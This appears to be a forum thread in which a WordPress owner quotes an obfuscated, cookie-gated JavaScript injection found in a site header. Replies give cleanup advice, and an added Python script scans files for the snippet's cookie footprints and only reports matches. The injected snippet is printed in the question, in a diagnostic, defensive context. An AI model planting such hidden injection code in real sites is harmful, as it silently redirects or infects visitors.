I've got a WordPress installation that's been targeted quite heavily by a phishing operation. I figured I had the security mostly covered, except I discovered this in the header:

var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<\/script>')};

That URL at the end is super suspicious. I researched it but found no leads :-(

I've not yet found the origin of the code in my WordPress installation. It isn't written into the template files or database. In the process of upgrading the WordPress install now.

Does anybody have any understanding of this?

That appears strange to me. Maybe try re-installing WordPress and choose very complex passwords so nobody unauthorized can access your website. You might like to remove the Google statistics code from the page and find out if that matters. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make certain it's longer than 8 letters. If your site is infected, take it down off the internet NOW until you're sure it isn't.

Randomly check a few of the WordPress install files. My FTP password was leaked. I used my female friend's laptop once and saved the password. She must have downloaded some adware and spyware that stole the passwords. The end result was that JavaScript was injected into virtually every file with a standard web extension. Then any page you could browse to was trying to redirect the user to a Russian site. Checking the website in Chrome showed an adware and spyware warning. The code I saw was more obfuscated than what you're seeing, but I would look at it. I wound up changing all passwords and running a script to check every file on the server for the footprint I had been seeing and remove it. That appears to have worked for me. If it's too complicated, speak to your host and have them look at that account.
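
A report-only version of the kind of footprint scan described in the answer above, as an added example that is not code from any poster in this thread. The extension list, the footprint names and the sample tree are assumptions made for illustration; the two patterns are the `hop`/`hip` cookie assignments from the snippet in the question.

```python
import os
import re
import tempfile

# Assumed list of "standard web extensions"; adjust for your site.
WEB_EXTENSIONS = {".php", ".html", ".htm", ".js"}

# Footprints copied from the snippet in the question: the two marker cookies.
FOOTPRINTS = {
    "hop-cookie": re.compile(rb'document\.cookie\s*=\s*"hop="\s*\+\s*escape\("hop"\)'),
    "hip-cookie": re.compile(rb'document\.cookie\s*=\s*"hip="\s*\+\s*escape\("hip"\)'),
}

def scan_file(path):
    """Return the sorted names of the footprints found in one file."""
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        return []  # unreadable: report nothing rather than abort the walk
    return sorted(name for name, pat in FOOTPRINTS.items() if pat.search(data))

def scan_tree(root):
    """Map each web file under root (relative path) to its matched footprints."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            matched = scan_file(full)
            if matched:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = matched
    return hits

def demo():
    """Scan a constructed sample tree: one clean file, one with the footprint."""
    injected = (b'<script>document.cookie="hop="+escape("hop")+";path=/";'
                b'document.cookie="hip="+escape("hip")+";path=/";</script>')
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "themes"))
        samples = {"index.php": b"<?php echo 'clean'; ?>",
                   "wp-content/themes/header.php": b"<html>" + injected,
                   "notes.txt": injected}  # not a web extension: skipped
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for path, names in sorted(demo().items()):
        print(path, names)
```

Point `scan_tree` at a copy of the web root and review each reported file by hand before changing anything; a differently obfuscated variant needs its own footprint added to `FOOTPRINTS`.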